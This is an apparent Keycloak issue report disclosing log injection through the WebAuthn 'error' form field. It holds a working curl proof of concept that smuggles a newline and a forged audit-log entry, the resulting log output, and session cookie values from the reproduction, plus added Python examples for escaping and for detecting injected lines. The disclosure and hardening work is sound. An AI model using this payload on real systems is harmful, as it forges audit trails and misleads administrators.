Bug
Resolution: Done
Before reporting an issue
[X] I have read and understood the above terms for submitting issues, and I understand that my issue may be closed without action if I do not follow them.
Area
authentication/webauthn
Describe the bug
Errors from the browser client during setup/authentication with "Security Key login" (WebAuthn) are written into the form, sent to Keycloak and written to the log without escaping. Any content can be sent in this request, which allows log injection.
Version
22.0.5
Expected behavior
Messages derived from user input are escaped to prevent (log) injection attacks.
Actual behavior
Request data is written to the log without escaping, which allows log injection.
How to Reproduce?
- Start login with a user who is required to set up a second authentication factor
- Configure "Security-Token"
- Get the form URL (<FORM_URL>) from the page source code
- Run the following command in a terminal (the cookie values are from the session in which this was reproduced and must be replaced with your own):
```shell
curl '<FORM_URL>' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Cookie: AUTH_SESSION_ID=9249c14d-1baa-43ba-a110-bbcdff689e9e.19d58cc8a8cf-28439; AUTH_SESSION_ID_LEGACY=9249c14d-1baa-43ba-a110-bbcdff689e9e.19d58cc8a8cf-28439; KC_STATE_CHECKER=eyJhbGciOiJIUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICI3NzQ1OTFkOC1hNGNlLTQ5MjUtODFlZS01NWQ5ZmM0YjhlZTgifQ.eyJta3kiOiJpbnZhbGlkQ29kZU1lc3NhZ2UiLCJtdHkiOiJFUlJPUiIsIm1wYXIiOltdLCJzdGF0Ijo0MDAsInN0MiI6ImY0NGE4NDU1LTU5MWYtNGNjYi1hZWZiLTIxYmQwMzE5OTRjYiJ9.AruNFsHMyHt1SF31TaRsN875qquIMSKhxp-dwfE4zts; KC_RESTART=eyJhbGciOiJIUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICI3NzQ1OTFkOC1hNGNlLTQ5MjUtODFlZS01NWQ5ZmM0YjhlZTgifQ.….U2_FfhLkAzJILgHfVYVL1-4dE4B7oEULDtRTl5XpgBw; __snackbar=IjZmMjA3NGFiZTg4MDUxZGQi.3USigr8kqbvE758yaKF5QkElgCUgieTfik%2FewsWYuhw; __session=ImE4ZTFmZTRhMTUzZmNlZjIi.MsiBCXKE1XZZHwcBe2lbTQ2RwnoTNplIR5sByOMB97Q' \
--data-raw 'clientDataJSON=&attestationObject=&publicKeyCredentialId=&authenticatorLabel=&transports=&error=invalid%5Fuser%5Fcredentials%2C%20credential%5Ftype%3Dwebauthn%2C%20auth%5Fmethod%3Dopenid%2Dconnect%2C%20web%5Fauthn%5Fregistration%5Ferror%5Fdetail%3D%27NotAllowedError%3A%20The%20operation%20either%20timed%20out%20or%20was%20not%20allowed%2E%20See%3A%20https%3A%2F%2Fwww%2Ew3%2Eorg%2FTR%2Fwebauthn%2D2%2F%23sctn%2Dprivacy%2Dconsiderations%2Dclient%2E%27%2C%20custom%5Frequired%5Faction%3Dwebauthn%2Dregister%2C%20response%5Ftype%3Dcode%2C%20web%5Fauthn%5Fregistration%5Ferror%3Dwebauthn%2Derror%2Dregister%2Dverification%2C%20redirect%5Furi%3Dhttp%3A%2F%2Flocalhost%3A8080%2Fauth%2Frealms%2Fc1%2Ds1%2Di1%2Faccount%2F%23%2F%2C%20remember%5Fme%3Dfalse%2C%20code%5Fid%3D9249c14d%2D1baa%2D43ba%2Da110%2Dbbcdff689e9e%2C%20response%5Fmode%3Dfragment%2C%20username%3Da%27%0A2023%2D11%2D03%2009%3A32%3A33%2C614%20WARN%20%20%5Borg%2Ekeycloak%2Eevents%5D%20%28executor%2Dthread%2D14%29%20type%3DCUSTOM%5FREQUIRED%5FACTION%5FERROR%2C%20realmId%3Dinst%2D001%2D001%2D001%2C%20clientId%3Daccount%2Dconsole%2C%20userId%3Dd5410969%2D4a04%2D4f35%2D87d3%2D76b9343119b2%2C%20ipAddress%3D172%2E18%2E0%2E1%2C%20error%3Dthe%20admin%20did%20something%20very%20evil%21%21%21%2C%20remember%5Fme%3Dfalse%2C%20code%5Fid%3D9249c14d%2D1baa%2D43ba%2Da110%2Dbbcdff689e9e%2C%20response%5Fmode%3Dfragment%2C%20username%3Dadmin'
```
Decoded, the `error` parameter contains a newline (`%0A`) followed by a forged log entry:
```
invalid_user_credentials, credential_type=webauthn, auth_method=openid-connect, web_authn_registration_error_detail='NotAllowedError: The operation either timed out or was not allowed. See: https://www.w3.org/TR/webauthn-2/#sctn-privacy-considerations-client.', custom_required_action=webauthn-register, response_type=code, web_authn_registration_error=webauthn-error-register-verification, redirect_uri=http://localhost:8080/auth/realms/c1-s1-i1/account/#/, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=a'
2023-11-03 09:32:33,614 WARN [org.keycloak.events] (executor-thread-14) type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, userId=d5410969-4a04-4f35-87d3-76b9343119b2, ipAddress=172.18.0.1, error=the admin did something very evil!!!, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=admin
```
- After sending that request, the log contains the following entries (the forged entry appears twice: once after the WebAuthnRegister warning and once inside the `error` field of the event):
```
keycloak-base-keycloak-1 | 2023-11-03 10:14:01,861 WARN [org.keycloak.authentication.requiredactions.WebAuthnRegister] (executor-thread-52) WebAuthn API .create() response validation failure. invalid_user_credentials, credential_type=webauthn, auth_method=openid-connect, web_authn_registration_error_detail='NotAllowedError: The operation either timed out or was not allowed. See: https://www.w3.org/TR/webauthn-2/#sctn-privacy-considerations-client.', custom_required_action=webauthn-register, response_type=code, web_authn_registration_error=webauthn-error-register-verification, redirect_uri=http://localhost:8080/auth/realms/c1-s1-i1/account/#/, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=a'
keycloak-base-keycloak-1 | 2023-11-03 09:32:33,614 WARN [org.keycloak.events] (executor-thread-14) type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, userId=d5410969-4a04-4f35-87d3-76b9343119b2, ipAddress=172.18.0.1, error=the admin did something very evil!!!, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=admin
keycloak-base-keycloak-1 | 2023-11-03 10:14:01,870 WARN [org.keycloak.events] (executor-thread-52) type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, userId=d5410969-4a04-4f35-87d3-76b9343119b2, ipAddress=172.18.0.1, error=invalid_user_credentials, credential_type=webauthn, auth_method=openid-connect, web_authn_registration_error_detail='invalid_user_credentials, credential_type=webauthn, auth_method=openid-connect, web_authn_registration_error_detail='NotAllowedError: The operation either timed out or was not allowed. See: https://www.w3.org/TR/webauthn-2/#sctn-privacy-considerations-client.', custom_required_action=webauthn-register, response_type=code, web_authn_registration_error=webauthn-error-register-verification, redirect_uri=http://localhost:8080/auth/realms/c1-s1-i1/account/#/, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=a'
keycloak-base-keycloak-1 | 2023-11-03 09:32:33,614 WARN [org.keycloak.events] (executor-thread-14) type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, userId=d5410969-4a04-4f35-87d3-76b9343119b2, ipAddress=172.18.0.1, error=the admin did something very evil!!!, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=admin', custom_required_action=webauthn-register, response_type=code, web_authn_registration_error=webauthn-error-register-verification, redirect_uri=http://localhost:8080/auth/realms/c1-s1-i1/account/#/, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=a
```
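The escaping asked for under "Expected behavior", as an added example in Python that is not Keycloak's code (Keycloak is Java and its logging calls are not modelled here). It rebuilds a shortened version of the report's `error` form field, reproduces the unescaped concatenation the report describes, and shows a hardened variant that escapes control characters and caps the length. The payload, the log prefix, the function names and the 1024-character cap are this example's own constructions.

```python
"""Added example (not Keycloak code): why the report's `error` form field
splits a log entry in two, and how escaping it before logging prevents that."""
import re
from urllib.parse import parse_qs, quote

# Constructed: a shortened version of the report's `error` value. What matters
# is the newline after username=a', followed by text that looks exactly like a
# Keycloak events log entry.
FORGED_ERROR = (
    "invalid_user_credentials, credential_type=webauthn, username=a'\n"
    "2023-11-03 09:32:33,614 WARN  [org.keycloak.events] (executor-thread-14) "
    "type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, "
    "error=the admin did something very evil!!!, username=admin"
)
# The form body as curl would send it (other fields empty, as in the report).
FORM_BODY = "clientDataJSON=&attestationObject=&error=" + quote(FORGED_ERROR, safe="")

# Constructed prefix modelled on the WebAuthnRegister warning in the report.
LOG_PREFIX = (
    "2023-11-03 10:14:01,861 WARN  [org.keycloak.authentication.requiredactions"
    ".WebAuthnRegister] (executor-thread-52) WebAuthn API .create() response "
    "validation failure. "
)

# CR, LF, the other C0/C1 control characters and the Unicode line separators:
# anything that can start a new "entry" in a line-oriented log.
_CONTROL = re.compile(r"[\x00-\x1f\x7f-\x9f\u2028\u2029]")


def decode_error_field(form_body: str) -> str:
    """Decode the `error` field exactly as a form handler would."""
    return parse_qs(form_body, keep_blank_values=True)["error"][0]


def escape_for_log(value: str, max_len: int = 1024) -> str:
    """Escape untrusted text before placing it in a log message.

    Control characters become visible \\xNN / \\uNNNN escapes, so the value
    stays on one line but remains inspectable; the result is capped so one
    request cannot flood the log.
    """
    def repl(match: re.Match) -> str:
        code = ord(match.group(0))
        return f"\\x{code:02x}" if code < 0x100 else f"\\u{code:04x}"

    escaped = _CONTROL.sub(repl, value)
    if len(escaped) > max_len:
        escaped = escaped[:max_len] + "...[truncated]"
    return escaped


def log_line_unsafe(error_field: str) -> str:
    """The behaviour the report describes: the raw field is concatenated in."""
    return LOG_PREFIX + error_field


def log_line_safe(error_field: str) -> str:
    """Hardened variant: the field is escaped first."""
    return LOG_PREFIX + escape_for_log(error_field)


def entries_seen(log_text: str) -> int:
    """Number of entries a line-oriented log shipper or SIEM would ingest."""
    return len(log_text.splitlines())


if __name__ == "__main__":
    err = decode_error_field(FORM_BODY)
    print("unsafe:", entries_seen(log_line_unsafe(err)), "entries")  # 2
    print("safe:  ", entries_seen(log_line_safe(err)), "entries")    # 1
    print(log_line_safe(err))
```

Escaping rather than stripping is deliberate: the `\x0a` left in the escaped line is itself evidence that someone tried to inject, and a detection rule can key on it.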
This is only a PoC; more sophisticated log manipulation is certainly possible.
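A detection check over the log lines above, as an added example that is not part of the report: a log file is appended in order, so a line whose timestamp is more than a second older than the line before it was not written by the logger but carried inside a message. The log lines are abbreviated copies of the four lines from the report; the threshold, the regex and the function names are this example's own.

```python
"""Added example (not Keycloak code): spot injected entries in a Keycloak log
by looking for timestamps that run backwards."""
import re
from datetime import datetime, timedelta

# Abbreviated copies of the four log lines from the report (key=value tails
# shortened). Lines 2 and 4 are the forged entry carried inside the `error`
# field; the logger itself never wrote them.
LOG_LINES = [
    "2023-11-03 10:14:01,861 WARN  [org.keycloak.authentication.requiredactions.WebAuthnRegister] "
    "(executor-thread-52) WebAuthn API .create() response validation failure. "
    "invalid_user_credentials, credential_type=webauthn, username=a'",
    "2023-11-03 09:32:33,614 WARN  [org.keycloak.events] (executor-thread-14) "
    "type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, "
    "error=the admin did something very evil!!!, username=admin",
    "2023-11-03 10:14:01,870 WARN  [org.keycloak.events] (executor-thread-52) "
    "type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, "
    "error=invalid_user_credentials, credential_type=webauthn, username=a'",
    "2023-11-03 09:32:33,614 WARN  [org.keycloak.events] (executor-thread-14) "
    "type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, "
    "error=the admin did something very evil!!!, username=admin', username=a",
]

# The line format as it appears in the report, with an optional
# "container | " prefix as docker compose prints it.
LINE_RE = re.compile(
    r"^(?:\S+ \| )?"
    r"(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}) "
    r"(?P<level>[A-Z]+) +\[(?P<logger>[^\]]+)\] \((?P<thread>[^)]+)\) (?P<msg>.*)$"
)


def parse_line(line: str):
    """Split one log line into its fields; None if it is not a log line."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S,%f")
    return rec


def find_injected(lines, max_backstep: timedelta = timedelta(seconds=1)):
    """Return the indexes of lines whose timestamp is older than the last
    trusted line by more than max_backstep.

    A real entry can never be much older than the one before it; a forged
    entry carries whatever timestamp the attacker typed. Small backsteps are
    tolerated because threads may emit lines slightly out of order. Flagged
    lines do not advance the reference time, so one forged line cannot hide
    the next."""
    injected = []
    last_ts = None
    for idx, line in enumerate(lines):
        rec = parse_line(line)
        if rec is None:  # not a log line (e.g. a stack-trace continuation)
            continue
        if last_ts is not None and last_ts - rec["ts"] > max_backstep:
            injected.append(idx)
        else:
            last_ts = rec["ts"]
    return injected


if __name__ == "__main__":
    for idx in find_injected(LOG_LINES):  # reports the two forged lines
        print(f"line {idx + 1}: {LOG_LINES[idx][:80]}...")
```

This catches the PoC because the forged timestamp is older than the surrounding entries; an attacker who forges a plausible future timestamp would not be caught by this check alone, which is why escaping at the source (the expected behaviour above) is the actual fix and the check is only a compensating control.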
Anything else?
This has been reported as a vulnerability, but was considered a security hardening issue.